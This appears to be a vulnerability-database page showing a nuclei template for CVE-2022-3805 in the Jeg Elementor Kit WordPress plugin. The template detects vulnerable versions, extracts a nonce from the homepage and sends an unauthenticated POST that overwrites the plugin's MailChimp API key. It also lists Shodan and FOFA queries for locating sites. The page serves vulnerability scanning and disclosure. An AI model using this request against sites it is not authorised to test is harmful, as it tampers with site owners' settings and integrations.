Lucene search
K

Jeg Elementor Kit < 2.5.7 - Unauthenticated Settings Update

šŸ—“ļøĀ 06 Jul 2026Ā 03:02:03Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 30Ā Views

Unauthenticated setting updates in Jeg Elementor Kit up to 2.5.6; fix in 2.5.7.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-3805
22 Dec 202221:15
–attackerkb
Circl
CVE-2022-3805
23 Dec 202200:14
–circl
CNNVD
WordPress plugin Jeg Elementor Kit å®‰å…Øę¼ę“ž
22 Dec 202200:00
–cnnvd
CVE
CVE-2022-3805
22 Dec 202220:26
–cve
Cvelist
CVE-2022-3805 Jeg Elementor Kit <= 2.5.6 - Unauthenticated Authorization Bypass
22 Dec 202220:26
–cvelist
EUVD
EUVD-2022-43146
22 Dec 202220:26
–euvd
NVD
CVE-2022-3805
22 Dec 202221:15
–nvd
Patchstack
WordPress Jeg Elementor Kit Plugin < 2.5.7 is vulnerable to Broken Access Control
3 Jan 202300:00
–patchstack
Prion
Authorization
22 Dec 202221:15
–prion
Positive Technologies
PT-2022-24175
22 Dec 202200:00
–ptsecurity
Rows per page
id: CVE-2022-3805

info:
  name: Jeg Elementor Kit < 2.5.7 - Unauthenticated Settings Update
  author: DhiyaneshDk,popcorn94
  severity: high
  description: |
    The Jeg Elementor Kit plugin for WordPress is vulnerable to authorization bypass in various functions used to update the plugin settings in versions up to, and including, 2.5.6. Unauthenticated users can use an easily available nonce, obtained from pages edited by the plugin, to update the MailChimp API key, global styles, 404 page settings, and enabled elements.
  impact: |
    Unauthenticated attackers can exploit authorization bypass using easily obtained nonces to update plugin settings including MailChimp API keys, global styles, and 404 page configurations, potentially compromising site integrations and design.
  remediation: Fixed in 2.5.7
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3805
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit/jeg-elementor-kit-256-unauthenticated-authorization-bypass
    - https://wordpress.org/plugins/jeg-elementor-kit/#developers
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9955d65-afb3-4d28-abd2-9f2fec92d013
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
    cvss-score: 8.6
    cve-id: CVE-2022-3805
    cwe-id: CWE-79
    epss-score: 0.01594
    epss-percentile: 0.72757
    cpe: cpe:2.3:a:jegtheme:jeg_elementor_kit:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: jegtheme
    product: jeg_elementor_kit
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/jeg-elementor-kit"
    fofa-query: body="/wp-content/plugins/jeg-elementor-kit/"
    publicwww-query: "/wp-content/plugins/jeg-elementor-kit/"
  tags: cve,cve2022,wordpress,wp,wp-plugin,jeg-elementor-kit,vkev,unauth,intrusive,vuln

variables:
  rand: "{{rand_text_numeric(5)}}"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /wp-content/plugins/jeg-elementor-kit/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "< 2.5.7")'
          - 'contains(body, "Jeg Elementor Kit")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - "(?mi)Stable tag: ([0-9.]+)"
        internal: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "jeg-elementor-kit")
          - contains(content_type, "text/html")
        condition: and
        internal: true

    extractors:
      - type: regex
        group: 1
        name: nonce
        regex:
          - 'jkit_nonce = "([a-zA-Z0-9]{10})"'
        internal: true

      - type: regex
        group: 1
        name: url
        regex:
          - 'jkit_ajax_url = "(http[s]?://[^"]+)"'
        internal: true

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        jkit-ajax-request=jkit_elements&form_data[mailchimp_api_key]={{rand}}&action=save_user_data&nonce={{nonce}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "Success Save Data")
          - contains(content_type, "application/json")
        condition: and
# digest: 4b0a004830460221008cdee686dd48180b50782de3174c9f89a3961e16c3438c090dae61efeb4b5ca0022100c51de05d6e668f10114002ed8a3d792cf6969b04e9b08647efc1f7da4059825d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation